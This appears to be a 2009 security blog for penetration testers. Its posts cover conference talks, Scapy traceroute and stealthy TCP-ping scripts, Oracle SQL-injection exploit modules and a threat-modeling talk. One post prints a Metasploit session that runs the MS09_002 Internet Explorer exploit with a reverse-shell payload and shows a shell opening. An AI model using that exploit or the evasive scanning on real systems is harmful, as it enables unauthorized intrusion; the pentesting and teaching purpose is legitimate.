Friday, February 27, 2009

Top 10 Web Hacking Techniques

Jeremiah Grossman just posted (well...awhile ago) the official Top Ten Web Hacking Techniques.

I want to give a shout out to dean who did a great post on ActiveX repurposing or "0wning the client without an exploit" back in August. ActiveX repurposing is #9 in the Top 10, and #41 (blog post linked there) on the big list. Unfortunately neither he nor c0 was specifically mentioned in the top 10, even though it was mentioned in the big list.

...maybe next year.

Wednesday, February 25, 2009

Traceroute Collector/ Aggregator for Scapy

One of the main reasons I picked up Scapy is for the graphs. I have never been a visual guy, so Scapy is like magic when it comes to network mapping, let alone network traffic manipulation. Well, I really liked Scapy's basic graphing features, but when you have a large set of hosts to traceroute, it gets annoying popping up the graphs with the black hole hosts. This is especially true when tracing the hosts' paths to the target network. Another thing that I wanted is the ability to group endpoints.

It took me about a week along with other work to get everything down (note last week's post), but I think I managed to get a basic implementation. I set it up so I can perform a number of individual traceroute operations and then drop them in a collector of sorts. Then, when all the traceroutes are complete, you can generate graphs with grouped endpoints and the black holes omitted. I borrowed some code from Philippe's implementation of TracerouteResult.make_graph. There is a lot of extra code in the TracerouteCollector class because I tried a few different ways of forming the graph. I eventually got so frustrated that I created a basic traceroute path string and parsed that result. I attempted merging TracerouteResults as well as maintaining other stuff, but it got complex quick, which led to more frustration.

Like I said, in the end I gave up on the native traceroute result object and built my own path string. Depending on whether the traceroute found the endpoint, it ends up in a completed path or incomplete path bin. When I build the graph, I go through and group the results based on the path taken and whether the endpoint was reached. I also go through and enumerate all the ASNs. However, when nodes are grouped together, the ASN is based off the first IP address in the grouping. Otherwise, there will be extraneous nodes in the image. While I don't do this, someone could just prune the ASN results, but I have another project that I need to start on, so I did not get around to that.
I also have code that will write the traceroute trace and the graph, and then read a traceroute trace back in from file. This might be useful if you want to do something else with it or save the traceroute for use later.

The class is meant to augment Scapy functionality so you would include it along with your Scapy includes:

# from scapy.all is imported in the trace_route_combine module
from trace_route_combine import *
t = TracerouteCollection()
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
# now to create the graph
# or get the graph string
gs = t.build_graph()
# get paths to all the trace routed hosts
# x> is a down host and => is an up host
paths = t.get_paths_to_hosts()
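
The path-string approach described above (bin each trace as completed or incomplete, group endpoints that share a path, draw only the completed paths) can be shown without Scapy on hand. The following is an added example, not code from trace_route_combine or the original post; the traceroute results and the "=>"/"x>" notation for up and down hosts are constructed to mirror the post's description, and the graph is emitted as Graphviz DOT text:

```python
from collections import defaultdict

# Constructed sample traceroute results (not from the original post or from
# trace_route_combine). Each entry holds the responding router per TTL
# (None where no reply came back) and whether the final hop was the target.
SAMPLE_TRACES = [
    {"target": "198.51.100.10", "hops": ["192.0.2.1", "192.0.2.9", "198.51.100.1"], "reached": True},
    {"target": "198.51.100.11", "hops": ["192.0.2.1", "192.0.2.9", "198.51.100.1"], "reached": True},
    {"target": "198.51.100.20", "hops": ["192.0.2.1", "192.0.2.9", "198.51.100.2"], "reached": True},
    {"target": "203.0.113.5", "hops": ["192.0.2.1", None, None], "reached": False},
]


def path_string(trace):
    """Render one trace as a path string: '=>' leads to a reached endpoint,
    'x>' to a black hole (the endpoint never answered)."""
    hops = " => ".join(h if h is not None else "*" for h in trace["hops"])
    arrow = "=>" if trace["reached"] else "x>"
    return f"{hops} {arrow} {trace['target']}"


def collect(traces):
    """Sort traces into a completed bin keyed by the path taken (so endpoints
    sharing a path are grouped) and an incomplete bin of black-hole paths."""
    completed = defaultdict(list)
    incomplete = []
    for trace in traces:
        if trace["reached"]:
            completed[tuple(trace["hops"])].append(trace["target"])
        else:
            incomplete.append(path_string(trace))
    return {k: sorted(v) for k, v in completed.items()}, incomplete


def build_dot(completed):
    """Emit a Graphviz DOT graph of the completed paths only. Endpoints that
    share a path are drawn inside one cluster hanging off the last router;
    unanswered intermediate TTLs (None) are skipped rather than drawn."""
    lines = ["digraph traceroute {", "  node [shape=box];"]
    edges = set()
    for group_id, (hops, targets) in enumerate(sorted(completed.items())):
        known = [h for h in hops if h is not None]
        for a, b in zip(known, known[1:]):
            edges.add(f'  "{a}" -> "{b}";')
        lines.append(f"  subgraph cluster_{group_id} {{")
        lines.append("    style=filled; color=lightgrey;")
        for t in targets:
            lines.append(f'    "{t}";')
        lines.append("  }")
        if known:
            for t in targets:
                edges.add(f'  "{known[-1]}" -> "{t}";')
    lines.extend(sorted(edges))
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    done, holes = collect(SAMPLE_TRACES)
    print(build_dot(done))
    for p in holes:
        print("black hole:", p)
```

Pipe the printed DOT into `dot -Tpng` to get the same kind of picture Scapy's make_graph produces, minus the black-hole hosts, which only appear in the incomplete bin.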

As usual the code is open source and licensed under GPL. If you like it let me know, if you hate it let me know too. This is experimental but usable code.


Saturday, February 21, 2009

Modern Social Engineering Webcast

Figured I'd pimp out what should be a really good webcast by Chris Nickerson and Mike Murray. They will also be doing a Social Engineering Course at the next ChicagoCon.


Webcast: Modern Social Engineering - A Vital Component of Pen Testing

The world of Information Security is changing. Budgets are tighter, attacks are more sophisticated, and the corporate network is no longer the low hanging fruit. That leaves web-enabled applications as the vector-du-jour, but that well is quickly drying up for organized crime as well. As they creep up the OSI Model looking for easier ways to steal your corporate assets, they are quickly making their way up the stack to the unspoken 8th layer, the end user. So what is the next step in the never-ending escalation of this cyber war?

To find out, we must do as Sun Tzu taught. "Think like our enemy!" That is, after all, the primary tenet of penetration testing AKA ethical hacking, isn't it? After years of hardening physical systems, networks, OSs, and applications, we have now come full circle to a new dawn of attack. People are now the target of the advanced hacker, and the cross-hairs are focused squarely on their foreheads... literally. It is only a matter of time before corporations feel the pain of wetware hacking requiring a new approach to testing and defense.

Join world-renowned social engineers, Chris Nickerson of TruTV's Tiger Team and noted expert and international speaker, Mike Murray, as they prepare you for the future of pen testing. This webcast on Tuesday March 10, 2009 at 11:00 CST is your primer to the world of "Modern Social Engineering."


New Oracle SQLI Coverage

MC recently added some Oracle SQLI exploits by Sh2kerr of Digital Security Research Group, which is a great site if you are into Oracle stuff. Their Different ways to guess Oracle SIDs paper is really good.

Info here

adds coverage for:

Oct 08 CPU


They also published
droptable_trigger (MDSYS.SDO_TOPO_DROP_FTBL Trigger)

which is coverage for:

Jan 2009 CPU

All four exploits are in trunk. Enjoy!

Friday, February 20, 2009

Response to How to Choose a Pen Tester

So a response to "How to Choose a Pen Tester"

Let me start by saying that I agree with the core of Steve's argument. Yes, if I pay someone to come in and do "anything" on my network I want to be able to trust them not to steal info, plant trojans, or air my dirty laundry out on the net when they are done.

I don't disagree with that.


A few comments; not sure they are quite counterpoints:

1. I personally don't see a big prevalence of pentest shops doing pentests and posting customer data on the net in any form. If there are examples, show me. He mentions in 6 months he heard ONE story about someone that did that and didn't provide a link...ummm ok. Is it believable that it does happen/has happened/could happen?...yes. That every pentest shop is doing it (except his, which is really the point of the post)... doubtful. It's not a smart business decision to 1) as a company do that or 2) allow your testers to do that on their personal blogs.

2. As David Hull mentioned, what is the problem with talking about a pentest as long as the customer can't be derived from the post/presentation/email or there isn't enough actionable information to conduct the attack? If companyX was vulnerable to SQLI 6 months ago and I went in and found it using some creative method and I decided to share that experience on my blog or at a conference, what is the problem with that? The company isn't vulnerable any more, and if I had to figure out some new method of doing "whatever", unless it was explicitly in the contract not to share "new pentest methods", aren't those mine to share as I see fit? It helps the community when others talk about things they have seen on a pentest, even if it's just to make the other guy feel a tad bit better that someone else lives in jacked up network hell. Though I always get a lot more out of people's posts about their pentests.

3. I realize that Steve proposes you do a scorecard, but really....trustworthiness over competence? Why on earth would you ever even consider doing business with someone you didn't trust? I don't see how anyone with half a brain would put themselves in the position of...hmmm do I choose the trustworthy CEH or the untrustworthy l33t ass hacker....ummm NEITHER! You pick a company that hires intelligent, competent, trustworthy people, plus the rest of the stuff on his scorecard. Are there really that many companies that are that piss poor that even make it past a scoping call? And more importantly, do the decision makers for choosing the testers not have the ability to pick the good from the bad?

I should insert a shameless plug here but I don't think it's necessary :-)

MS09_002 Memory Corruption Update

CG just pushed the code to the Metasploit trunk, so go run 'svn update' and enjoy. Any feedback would be good. I'll write up a little something on it and on how the vuln is triggered too when I get a chance.

dean de beer

Thursday, February 19, 2009

Quick Scapy Tutorial for Extending Tools: Batch Tcpping

Originally posted from here.

Like every good hacker with nothing to do, I have my hand in someone else's cookie jar learning how to do something cool. This week I took some time to learn how to use Scapy 2.0, and I wrote a script to perform a batch TCP ping. I am sure someone will say in the back of their mind...."there is this tool called nmap." My response: yes, I know, and everyone uses that tool; I want to fly under the radar, not into it. I am not saying what I did guarantees I am not in that category, but it's a step away from the crowd.

I wanted to control some of the data in the TCP segment (e.g. payload, sequence number, dport, sport, etc.), and if I had something to tell me *waves hands in circles* whether there was possibly an IPS or firewall in my way, that would be nice too. Basically, all this script does for the time being is take a file of hosts to be expanded/reconned and TCP-ping them with some randomized settings in the TCP layer. Not novel or innovative, but a good learning exercise. There are a couple of other directions that I would like to take this, but for the time being, I figured I would share what I have and what I learned. This is for Scapy 2.0+; there was a major software change between the two releases. I am going to basically list the interesting parts of my code and explain what I am doing. I learn by example, and in this fast, furious world of "teh netz", I am sure others do too. I have been told my posts are a tad lengthy, so I will just hit the highlights.

I know there is logic that I could put in the script to make it a little smarter and faster, but for now it can serve as a good tutorial for others. Apparently, Google Blogger might be distorting the code a bit, but it can be seen in its full Pythonic whitespaced beauty here.

Step 1. Importing Scapy into the script and silencing the verbosity:

from scapy.all import *
# default conf.verbose = 2
conf.verbose = 0

Step 2. Create my TCP ping packet and send it on its way

def tcp_ping_host(host, port=80, ppayload=None, to=1):
    # host is the ip-address string
    # port is the destination port to probe; the source port is randomized
    # seq is a random initial sequence number for the packet
    # if we want to mix it up and add arbitrary payloads
    # simply make ppayload into a string, or a RandString(size, chars)
    p = IP(dst=host)/TCP(dport=port, sport=RandShort(), seq=RandShort())
    if ppayload:
        # stack the payload on top of the TCP layer; assigning to p.payload
        # directly would replace the TCP layer instead of appending data
        p = p/Raw(load=str(ppayload))
    pOpen = False
    hIPS = False
    # send a single packet and wait to*1 seconds for a response
    a = sr1(p, timeout=to)
    # if the answer, a, is None, the host did not respond
    # if a is a response, and it is ICMP type 3 (destination unreachable),
    # then the host is unreachable; code 3 (port unreachable) indicates
    # there may be a host there, as in a UDP-style scan
    # a.haslayer(ICMP) checks if the packet has an ICMP layer
    # a.getlayer(ICMP) gets the instance of the layer and then
    # the fields for that layer can be referenced, e.g.
    # a.getlayer(ICMP).type lets us access the type field
    if a is None:
        return a, False, False, False
    elif a.haslayer(ICMP) and a.getlayer(ICMP).code != 3 \
            and a.getlayer(ICMP).type != 3:
        return a, False, False, False
    # 0x12 is SYN-ACK in the flags field of the TCP segment
    pOpen = a.haslayer(TCP) and (a.getlayer(TCP).flags == 0x12)
    # try with a bad checksum
    # some IPS/IDS/firewalls respond to all packets, so let's mix
    # it up and shoot a random/bad checksum at them
    # to do this we take p and set the chksum to a random
    # short value and send it along (idea was grabbed from the nmap docs)
    t = p.getlayer(TCP)
    t.chksum = RandShort()
    b = sr1(p, timeout=to)
    # if we get a reply, it's safe to say the host is FAIL
    # or it's a security device.
    if b is not None:
        hIPS = True
    # fini. hope it was as fun for you as it was for me.
    # Spent all day in the coffee shop on this one, yay!
    return a, True, hIPS, pOpen
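
The bad-checksum trick in the function above rests on one fact about a correct TCP stack: a segment whose checksum does not verify is silently discarded, so any reply to such a probe comes from something that answers without validating the segment. As an added example (not code from the original script; the addresses, ports and window size are constructed), here is the checksum a receiving stack computes over the IPv4 pseudo-header and the segment, with a valid SYN beside one whose checksum field has been overwritten the way the probe does it:

```python
import socket
import struct

# Constructed sample values (not from the original script): a SYN from
# 10.0.0.1:40000 to 10.0.0.2:80 with sequence number 0 and an 8192-byte window.
SRC, DST = "10.0.0.1", "10.0.0.2"
TCP_PROTO = 6
SYN = 0x02
CHECKSUM_OFFSET = 16  # byte offset of the checksum field inside the TCP header


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src: str, dst: str, segment: bytes) -> int:
    """Checksum over the IPv4 pseudo-header (src, dst, zero, proto, length)
    plus the TCP segment. Pass a segment whose checksum field is zero to
    compute it; pass a received segment and expect 0 to verify it."""
    pseudo = (socket.inet_aton(src) + socket.inet_aton(dst)
              + struct.pack("!BBH", 0, TCP_PROTO, len(segment)))
    return (~ones_complement_sum(pseudo + segment)) & 0xFFFF


def build_segment(sport: int, dport: int, seq: int, window: int, flags: int = SYN) -> bytes:
    """A bare 20-byte TCP header with the checksum field left at zero."""
    data_offset = 5 << 4  # five 32-bit words, no options
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, data_offset, flags, window, 0, 0)


def finalize(src: str, dst: str, segment: bytes) -> bytes:
    """Fill in the checksum the way a sending stack does."""
    csum = tcp_checksum(src, dst, segment)
    return segment[:CHECKSUM_OFFSET] + struct.pack("!H", csum) + segment[CHECKSUM_OFFSET + 2:]


def corrupt(segment: bytes, bad_checksum: int) -> bytes:
    """Overwrite the checksum field, mimicking the randomized-chksum probe."""
    return (segment[:CHECKSUM_OFFSET] + struct.pack("!H", bad_checksum & 0xFFFF)
            + segment[CHECKSUM_OFFSET + 2:])


def checksum_valid(src: str, dst: str, segment: bytes) -> bool:
    """The check a receiving TCP stack performs before it will answer a segment."""
    return tcp_checksum(src, dst, segment) == 0


if __name__ == "__main__":
    raw = build_segment(40000, 80, 0, 8192)
    good = finalize(SRC, DST, raw)
    bad = corrupt(good, 0xBEEF)
    print("computed checksum: 0x%04X" % tcp_checksum(SRC, DST, raw))
    print("good segment accepted:", checksum_valid(SRC, DST, good))
    print("bad-checksum probe accepted:", checksum_valid(SRC, DST, bad))
```

A host whose stack does this check never sees the second probe at all, which is why a reply to it is evidence of a device in the path rather than of the host itself.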

There is some other functionality hidden away in the script, like scanning a set of ports randomly, scanning hosts in random order, and resuming a scan (or adding hosts to a do-not-scan list, etc.). I have not tested all that stuff, but it's there. I also posted some code a few light years ago on OpenRCE about using Scapy. Anyway, enough talk, time for bed. Hope this was helpful to some. Have a good weekend.

As always here is my code:

BlackHat Day 1 Writeup

As promised...

The keynote was pretty good, there is lots of buzz about it on the net. BlackHat was nice enough to post the video:

Like usual it seems I picked the wrong least for my first talk... There is tons of buzz about the SSL talk, which I did not attend. But I will be watching it tomorrow, since BH was nice enough to share it as well.

Instead I went to Travis Goodspeed's Reversing and Exploiting Wireless Sensors. Travis is amazing at hardware hacking. I didn't take a lot of notes on the talk because most of it was over my head, but for me the big takeaway is that just because things aren't PCs doesn't mean they aren't on the network, and it certainly doesn't mean they aren't pwnable. Travis basically demonstrated the various ways to defeat two popular microcontrollers, which could lead to all kinds of fun things if you have a ZigBee network in your infrastructure.

I left the Vista Security Internals one, too much Windows code for my brain to handle. The gist was that there were some major changes to LSASS with Vista SP1 that would make stealing password hashes out of memory via DLL injection much, much harder to do. If someone stayed for the whole thing I'd appreciate a wrap up of what the dealio was and whether it has been defeated yet. I went over to the OS X talk, but he had already talked about whatever it was about and was doing demos.

After lunch I went to the Attacking Intel Trusted Execution Technology talk. Very cool stuff. I'll skip my "gist of the talk"; you can just watch it for yourself. Bottom line: lots of BIOSes and computers are completely backdoorable and all your trusted computing platform stuff won't even know...very cool stuff.

Michael Sutton's A Wolf in Sheep's Clothing: The Dangers of Persistent Web Browser Storage covered four big issues: HTTP cookies, Flash Local Shared Objects, Google Gears, and HTML 5.

Most notable were Google Gears, now just Gears, and HTML5, which allow for client-side relational databases. Very interesting attack vectors start to come into play: with the client-side DB, all an attacker needs is an XSS on any site to read the database out of the client-side DB. The issues with discovering table names and structure are gone, because the attacker would already have a copy of their own database to discover that; all the attacker would need to do is determine the username for the victim.

Adam Laurie talked about Satellite Hacking for Fun and Profit. I caught the tail end of the talk but it was also very interesting. Rather than butcher a synopsis, you can watch it. But in short, capturing TCP & UDP as well as other fun unlisted channels over your home satellite box.

Also...Media Archives are up:


ChicagoCon 2009s is coming up!

Don has published info on ChicagoCon 2009s. The Social Engineering training by Chris Nickerson and Mike Murray should be awesome, and the Con portion always has really great speakers. So if you are in the Chicago area you should definitely check it out.

ChicagoCon 2009s
Training: May 4 - 8
Conference: May 8 - 9

This is a small regional event that has grown organically. It will only continue to be successful with your help. Please help spread the word by mouth, blog, banner (feel free to steal pics from EH-Net), email... all is appreciated.

Just a quick announcement about the upcoming spring edition of ChicagoCon. As you know, we have completely separated the training from the conference. It was such a success, that we are continuing with that model. Registration is now open for all courses and the Ethical Hacking Conference. If you are taking one of our training courses, then the Conference is included in the price of your class. If not, Conference Only Tickets are just $100.

Training Details May 4 - 8

All courses are 5 days in length except CISSP which is 7. All courses feature most meals, computers are provided, all exams are held on site and a FREE ticket to the Ethical Hacking Conference. We are now offering a $200 Discount Off Training for Early Registration. Discount ends March 15, 2009! Here's the lineup (See Details on the site including pricing):

* Exclusive Course Offering: Social Engineering Master Class by Chris Nickerson (TruTV's Tiger Team) & Mike Murray (Expert and International Speaker)

* Popular Cert Classes by Training Camp
- Fundamentals with Network+ & Security+

* Adv. Tech. Courses by InfoSec Institute
- Expert Pen Testing (CEPT)
- Reverse Engineering Malware (CREA)
- Web App Security (CASS)

Ethical Hacking Conference Details May 8 - 9

Only 250 Conference Only Tickets are being made available, so get yours NOW!! Talks by Chris Gates, Craig Heffner, Jack Koziol, Ryan Linn, Mike Murray, Chris Nickerson, Tim Rosenberg, Andrew Whitaker, and many more.

- Keynotes & Technical Presentations
- Capture the Flag with White Wolf Security
- "The Doctor Is In" Career Counseling
- Lock Picking 101
- Resumania
- Evening Entertainment

Subject to change, so please keep an eye on the site. Specifics and schedules will be posted in the coming weeks Right HERE!


Wednesday, February 18, 2009

BlackHat Day 1...writeup coming soon

Yeah I fully intended to do my day 1 write up, but Lost was on, sorry...

But I do have notes, and if I'm motivated in the morning I will do it on the train in for Day 2.

Couple of quick highlights with more tomorrow.

Travis Goodspeed is a hardware ninja and all zigbee are belong to Travis.

Michael Sutton with client side SQLI is the new hotness. Go Google Gears!

Adam Laurie is still the RFID man! and now I have to buy satellite gear because his commercial satellite hacking was the shizzle!

I got to see HD Moore in the flesh...that's always cool.

Lunch was way better than last year

some gripes...

no free BlackHat T-shirt! what the F**k!!! for $1200+ people deserve their free BlackHat T-shirt and shouldn't have to pay 20 bucks for one. man, that really started me off on a downer for the day

no phone signal in the con area so no twitter :-( ...yeah I don't have an iphone so I couldn't just connect to the wifi, because I have verizon and they border on cruel and unusual punishment.

Day 2

looking forward to Valsmith and Collin's talk and David Litchfield's talk.

MS09_002 Memory Corruption Exploit

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to
[*] Command shell session 1 opened ( ->
dean de beer

UT SSE Presentation: Introduction to Software Security and Threat Modeling

Last Friday, I had the opportunity to introduce some aspects of software security and threat modeling to the UT Student Software Engineering Group, which included a mix of undergraduate and graduate students as well as faculty. The presentation format was more of an open discussion where I would answer questions as I spoke, and we would engage in conversation about the topic of the question. I enjoy this format, because the presentation evolves with the group, and not the presenter. The presentation is up on the site and located here.

During the course of the presentation, several interesting questions came up that I was not prepared to answer completely. Additionally, I feel it would be good to share the questions and my thoughts with others after researching them. One question was about the economics of software security and whether or not security integrated into the software development life cycle is worth the effort. Another question asked whether threat modeling and software security are effective in reducing vulnerabilities and other unwanted issues such as bugs. The final question was specific to software developers and what can be done besides writing good code. There are a number of great references on the topic of software security, and my comments may only scratch the surface. If you want to learn more, I have provided some URLs and books I have used to get you started. As a starting point, I used a presentation given by Chris Peterson, who presented on Microsoft Windows 7 Security at XCon, put on by XFocus [1].

The first topic that came up during the presentation concerned metrics and how security helps improve the software engineering process. Additionally, there were questions about cost savings, specifically whether security makes the software engineering process more expensive. My answer to these questions is: it depends.

First off, security is one ingredient in the software engineering process. If everything in the process is done correctly and security is integrated into it, as the SDL describes, then over time I see the cost of the software being lower than without security. Cost can be driven down in a number of ways. In 2002, RTI published a report about poor testing standards and the impact on the economy [2]. They published costs due to poor QA and testing and then potential savings. Given this, let's look at QA and testing. These are some of the hardest and most laborious tasks in the software engineering process, outside of the actual development. When tools such as threat modeling or fuzzing are employed, these costs can be lowered. Threat modeling can be used to identify how the application will be used and abused (e.g., test cases and abuse cases), along with identifying more sensitive and critical areas in the software, or areas where automated testing can be performed. One inherent benefit is identifying and performing testing in the areas that need it most, rather than testing the entire product equally.

Automated testing frameworks can also be developed or augmented to meet the automated testing needs of the project. From the TM, test patterns and cases can arise, and these can then be fed into the testing framework. This aspect helps save money because machine clock cycles are cheaper than human man-hours. Additionally, the framework and test patterns can be kept in a library for future use, so the fuzzing investment can be reused and even built into other projects. So in this case there may be a higher overhead due to threat modeling and automated security testing framework development, but there is also a potential savings over the life of the project, and other projects as well. As far as money or cost savings from these activities, I do not have figures. But a question did arise about the cost of a security breach, and I found a figure that was about $202 per record [3,4]. But there is no comparison or metric for money saved. There are other places where money can be saved like a streamlined patching process or reliability as a result of security, but for brevity we will continue on to the other questions that arose.

While my first answer implies better security is possible, it does not prove it with empirical data. The second discussion we had was about improved product security. Since Microsoft began using the SDL in 2002, they have seen a sharp decrease in the number of critical vulnerabilities in their operating systems [5]. The following figure is excerpted from the H1 2008 Desktop OS Vendor Report.

Image From H1 2008 Desktop OS Vendor Report p. 13, Vulnerabilities By Product, Severity (Reduced Linux Configuration)

The figure shows vulnerabilities (critical, medium, and low) by OS, comparing Windows Vista, Windows XP SP2, Mac OS X, Ubuntu, and RHEL. It shows Windows Vista with far fewer vulnerabilities than the other desktop platforms. Additionally, on Microsoft’s Malware Protection Center site, there is a graph on page 15 of [6] which shows the infection rates of each of their operating system platforms, with Windows Vista showing far fewer infections than most of the others. The only OS with fewer infections is Windows Server 2003 SP2, which could be for more than one reason: 1) it has fewer deployments, 2) it is not used for everyday activities that expose it to the threats seen by consumer desktops (e.g. no changes to default security settings), or 3) it's more secure. Microsoft’s Vista OS is one of the flagship products for the SDL process. When Windows XP and Windows Vista are compared in vulnerabilities and infection rates, a conclusion can be drawn that a successful SDL can help build a successfully secure product.

Another issue that came up is the insider threat and how to model it, more specifically the byzantine user who has some motive to do harm. Insider threats are the most expensive and dangerous aspects of a security system. In these cases, threat modeling can help identify critical assets, data, systems, etc. and identify mitigation strategies. First of all, the Principle of Least Privilege should be used. This can help knock down the most significant risks, because users are only privileged to do the role they fill. For example, a banking clerk should not be given administrative access to their host. Technical and human checks and balances (e.g. controls) should be integrated into architectures, designs, and implementations. The controls might require multiple authoritative personnel to sign in and allow critical changes. The controls might come in the form of policy, but a rogue user with ulterior motives may circumvent the system to meet their own objectives, so logging and review should also be heavily integrated into the system. As an example, any work a network engineer does should be checked by a peer to prevent malicious or catastrophic events. In one case, a major corporation was spared millions by a review of server management scripts [7]. However, their security policies should be heavily scrutinized and rewritten. There are as many ways to circumvent security controls as there are to mitigate the threats. TM will help assess the risk and help place a value on how much mitigation is necessary and where the mitigation needs to be employed to thwart these types of attackers. In any environment, Defense-in-Depth is key in ensuring overlapping security coverage and positive failure. Like software engineering, there is no silver bullet.
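
The three controls named above for the insider case (least privilege through roles, a second authoritative person signing off on critical changes, and logging of every decision for review) fit together in a small amount of code. What follows is an added example, not material from the presentation; the principals, roles and change identifier are hypothetical, and the change itself is a stand-in for whatever a network engineer's critical operation would be:

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed role table (hypothetical users, not from the presentation):
# each principal holds only the role its job needs (least privilege).
ROLES: Dict[str, Set[str]] = {
    "alice": {"netops"},
    "bob": {"netops"},
    "carol": {"helpdesk"},
}


@dataclass
class AuditLog:
    """Append-only record of every attempt, allowed or denied, for later review."""
    entries: List[dict] = field(default_factory=list)

    def record(self, actor: str, action: str, change_id: str, outcome: str, reason: str = "") -> None:
        self.entries.append({"actor": actor, "action": action, "change": change_id,
                             "outcome": outcome, "reason": reason})

    def denied(self) -> List[dict]:
        return [e for e in self.entries if e["outcome"] == "denied"]


class CriticalChange:
    """A change that needs sign-off from a second, suitably privileged person
    before it can be applied: separation of duties plus role checks, with
    every decision written to the audit log."""

    def __init__(self, change_id: str, requester: str, required_role: str, log: AuditLog):
        self.change_id = change_id
        self.requester = requester
        self.required_role = required_role
        self.log = log
        self.approver: Optional[str] = None
        self.applied = False

    def approve(self, approver: str) -> bool:
        if approver == self.requester:
            self.log.record(approver, "approve", self.change_id, "denied", "self-approval")
            return False
        if self.required_role not in ROLES.get(approver, set()):
            self.log.record(approver, "approve", self.change_id, "denied",
                            f"lacks role {self.required_role}")
            return False
        self.approver = approver
        self.log.record(approver, "approve", self.change_id, "allowed")
        return True

    def apply(self, actor: str) -> bool:
        if self.approver is None:
            self.log.record(actor, "apply", self.change_id, "denied", "no second-person approval")
            return False
        if self.required_role not in ROLES.get(actor, set()):
            self.log.record(actor, "apply", self.change_id, "denied",
                            f"lacks role {self.required_role}")
            return False
        self.applied = True
        self.log.record(actor, "apply", self.change_id, "allowed", f"approved by {self.approver}")
        return True


def demo() -> AuditLog:
    """Walk one constructed change through the control and return its audit trail."""
    log = AuditLog()
    change = CriticalChange("CHG-0001", requester="alice", required_role="netops", log=log)
    change.apply("alice")      # denied: nobody else has looked at it yet
    change.approve("alice")    # denied: the requester cannot approve their own work
    change.approve("carol")    # denied: helpdesk is not netops
    change.approve("bob")      # allowed: a second netops engineer signs off
    change.apply("alice")      # allowed
    return log


if __name__ == "__main__":
    for entry in demo().entries:
        print(entry)
```

The denied entries are the ones a reviewer wants to see: a pattern of repeated self-approval attempts or role mismatches is exactly the signal the logging-and-review requirement exists to surface.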

One final topic that came up in the presentation was technology, specifically what else there is besides code security. On the developer side of the fence, there are a number of exercises that can be performed to ensure code security, which might include code analysis (e.g. static or dynamic analysis), code reviews, policies regarding unsafe APIs, input validation, code signing and obfuscation, etc., from development up to deployment of the product. There are also technologies and policies that can be used to supplement code security when the software is in production. As I mentioned, Defense-in-Depth is the key to a successful security plan. Technologies and policies need to be chosen to accommodate and secure software products. For example, when a product is RTM, all debugging symbols should be stripped and stack checking should be enabled to prevent arbitrary control from stack overflows. The deployment platform should be secure by default, meaning features such as DEP and memory randomization are enabled. Depending on the deployment scenario, other steps may be taken. If this is a large IT project, the systems involved can be reviewed against secure configuration guidelines, network technologies for logging and access control can be used, etc. There is an entire laundry list of things that can be done outside of the code level.

Security is all about engineering. There are a vast number of things that can be done to ensure a successful product development cycle. I feel that a TM is the keystone of this success. It helps everyone understand the goals of the product and each component, leading up to identifying and understanding how to contain or handle threats. I equate threat models for software engineers to a battle plan for war fighters. The threat model provides insight into the security landscape, it helps flesh out logistical and strategic details, and everyone should come out with an understanding of what they need to do to make the project a success. I could go on about this topic, because I love to discuss this and educate others about security. I have been doing this for a while, and I really do have much to share, but given this has all been said at one time or another, I will simply present some links of interest.

Links to OWASP regarding information and application security:


OWASP Security Principles (for Developers and Designers) (not just for software folks)

OWASP How-to Articles

Microsoft SDL and Software Security Information:

Microsoft’s SDL Home Page

Microsoft’s Threat Modeling Tool

Microsoft’s Security Intelligence Reports and Malware Protection Group

Here are just a few books I have read or keep available in my library:

Coding Standards and SDL Practices

M. Howard and D. LeBlanc, Writing Secure Code, ed. 2. Redmond: Microsoft Press, 2003.

M. Howard and S. Lipner, The Security Development Lifecycle. Redmond: Microsoft Press, 2006.

G. McGraw, Software Security: Building Security In. Upper Saddle River: Addison Wesley, 2006.

Software Testing and Assessment

G. McGraw and G. Hoglund, Exploiting Software: How to Break Code. Boston: Addison Wesley, 2003.

M. Sutton, A. Greene, and P. Amini, Fuzzing: Brute Force Vulnerability Discovery. Upper Saddle River: Addison Wesley, 2007.

M. Dowd, J. McDonald, and J. Schuh, The Art of Software Security Assessment: Identifying and Preventing Vulnerabilities. Upper Saddle River: Addison Wesley, 2007.


1. C. Peterson. “Windows 7 Security Overview.” XCon2008 XFocus Information Security Conference. November, 2008.

2. RTI. “Planning Report 02-3: The Economic Impacts of Inadequate Infrastructure for Software Testing (2009).” NIST [Online], Available,

3. Walt. “Cost of a Security Breach (2009).” PCI DSS News and Information [Online]. Available,

4. “2008 Annual Study: Cost of a Data Breach (2009).” Ponemon Institute. [Online]. Available,

5. J. Jones, H1 2008 Desktop OS Vendor Report (2009). [Online], Available,

6. Microsoft Security Intelligence Report volume 5 (January – June 2008) (2009). Microsoft [Online]. Available,

7. K. Poulsen. “Fannie Mae Logic Bomb Would Have Caused Weeklong Shutdown (2009).” Wired [Online], Available,

Post originates from here.

Saturday, February 14, 2009

Dictionary Based Rainbow Tables with Dr-crack

After Matt Weir's ShmooCon talk I got motivated to generate and play with some dictionary-based rainbow tables with Dr-crack. Why... I don't know, I pass the hash for everything now, and

"Dictionary based rainbow tables, such as those generated by drcrack, on the other hand allow you to create pre-generated hash tables based on dictionary words and common word mangling rules, such as 'P@ssword12'."

